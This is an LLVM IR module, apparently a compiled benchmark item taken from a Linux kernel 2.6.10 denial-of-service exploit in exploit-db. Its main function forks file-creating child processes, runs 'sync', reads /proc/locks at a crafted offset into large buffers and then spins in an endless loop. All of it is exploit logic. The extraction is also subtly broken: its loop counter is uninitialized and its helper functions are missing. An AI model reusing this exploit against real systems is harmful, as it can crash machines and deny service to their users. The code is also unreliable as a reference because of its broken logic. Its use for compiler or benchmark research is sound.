; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/dos/extr_25322.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/dos/extr_25322.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [44 x i8] c"\09\09kernel-2.6.10 DoS by ChoiX [Unl0ck Team]\0A\00", align 1
@.str.1 = private unnamed_addr constant [47 x i8] c"[--]create files(it can take a few minutes)...\00", align 1
@.str.2 = private unnamed_addr constant [4 x i8] c"OK\0A\00", align 1
@.str.3 = private unnamed_addr constant [24 x i8] c"[--]start exploiting...\00", align 1
@.str.4 = private unnamed_addr constant [5 x i8] c"sync\00", align 1
@.str.5 = private unnamed_addr constant [12 x i8] c"/proc/locks\00", align 1
@O_RDONLY = common dso_local global i32 0, align 4
@.str.6 = private unnamed_addr constant [7 x i8] c"ERROR\0A\00", align 1
@.str.7 = private unnamed_addr constant [7 x i8] c"open()\00", align 1
@SIZE = common dso_local global i32 0, align 4
@SEEK_SET = common dso_local global i32 0, align 4
@.str.8 = private unnamed_addr constant [9 x i8] c"llseek()\00", align 1
@.str.9 = private unnamed_addr constant [5 x i8] c"read\00", align 1
@.str.10 = private unnamed_addr constant [28 x i8] c"read=%d mv=%x fv=%x\0A %.300s\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i32, align 4
  %7 = alloca i32, align 4
  %8 = alloca i32, align 4
  %9 = alloca i32, align 4
  %10 = alloca i8*, align 8
  %11 = alloca i8*, align 8
  %12 = alloca i8*, align 8
  %13 = alloca i32, align 4
  %14 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %15 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([44 x i8], [44 x i8]* @.str, i64 0, i64 0))
  %16 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([47 x i8], [47 x i8]* @.str.1, i64 0, i64 0))
  store i32 5, i32* %14, align 4
  br label %17

17:                                               ; preds = %26, %2
  %18 = load i32, i32* %6, align 4
  %19 = add nsw i32 %18, -1
  store i32 %19, i32* %6, align 4
  %20 = icmp ne i32 %18, 0
  br i1 %20, label %21, label %27

21:                                               ; preds = %17
  %22 = call i32 (...) @fork()
  %23 = icmp ne i32 %22, 0
  br i1 %23, label %26, label %24

24:                                               ; preds = %21
  %25 = call i32 (...) @createfile()
  br label %26

26:                                               ; preds = %24, %21
  br label %17

27:                                               ; preds = %17
  %28 = call i32 @sleep(i32 100)
  %29 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str.2, i64 0, i64 0))
  %30 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([24 x i8], [24 x i8]* @.str.3, i64 0, i64 0))
  %31 = call i32 @system(i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str.4, i64 0, i64 0))
  %32 = load i32, i32* @O_RDONLY, align 4
  %33 = call i32 @open(i8* getelementptr inbounds ([12 x i8], [12 x i8]* @.str.5, i64 0, i64 0), i32 %32)
  store i32 %33, i32* %7, align 4
  %34 = load i32, i32* %7, align 4
  %35 = icmp slt i32 %34, 0
  br i1 %35, label %36, label %39

36:                                               ; preds = %27
  %37 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.6, i64 0, i64 0))
  %38 = call i32 @perror(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.7, i64 0, i64 0))
  br label %39

39:                                               ; preds = %36, %27
  %40 = call i8* @malloc(i32 8388608)
  store i8* %40, i8** %11, align 8
  %41 = call i8* @malloc(i32 8388608)
  store i8* %41, i8** %12, align 8
  %42 = load i32, i32* %7, align 4
  %43 = load i32, i32* @SIZE, align 4
  %44 = load i32, i32* @SEEK_SET, align 4
  %45 = call i32 @_llseek(i32 %42, i32 42, i32 %43, i32* %13, i32 %44)
  %46 = icmp eq i32 %45, -1
  br i1 %46, label %47, label %50

47:                                               ; preds = %39
  %48 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.6, i64 0, i64 0))
  %49 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([9 x i8], [9 x i8]* @.str.8, i64 0, i64 0))
  br label %50

50:                                               ; preds = %47, %39
  %51 = load i32, i32* %7, align 4
  %52 = load i8*, i8** %12, align 8
  %53 = load i32, i32* @SIZE, align 4
  %54 = call i32 @read(i32 %51, i8* %52, i32 %53)
  store i32 %54, i32* %8, align 4
  %55 = call i32 @perror(i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str.9, i64 0, i64 0))
  %56 = load i32, i32* %8, align 4
  %57 = load i8*, i8** %10, align 8
  %58 = ptrtoint i8* %57 to i32
  %59 = load i32, i32* %9, align 4
  %60 = load i8*, i8** %12, align 8
  %61 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([28 x i8], [28 x i8]* @.str.10, i64 0, i64 0), i32 %56, i32 %58, i32 %59, i8* %60)
  br label %62

62:                                               ; preds = %50, %62
  br label %62
}

declare dso_local i32 @printf(i8*, ...) #1

declare dso_local i32 @fork(...) #1

declare dso_local i32 @createfile(...) #1

declare dso_local i32 @sleep(i32) #1

declare dso_local i32 @system(i8*) #1

declare dso_local i32 @open(i8*, i32) #1

declare dso_local i32 @perror(i8*) #1

declare dso_local i8* @malloc(i32) #1

declare dso_local i32 @_llseek(i32, i32, i32, i32*, i32) #1

declare dso_local i32 @read(i32, i8*, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
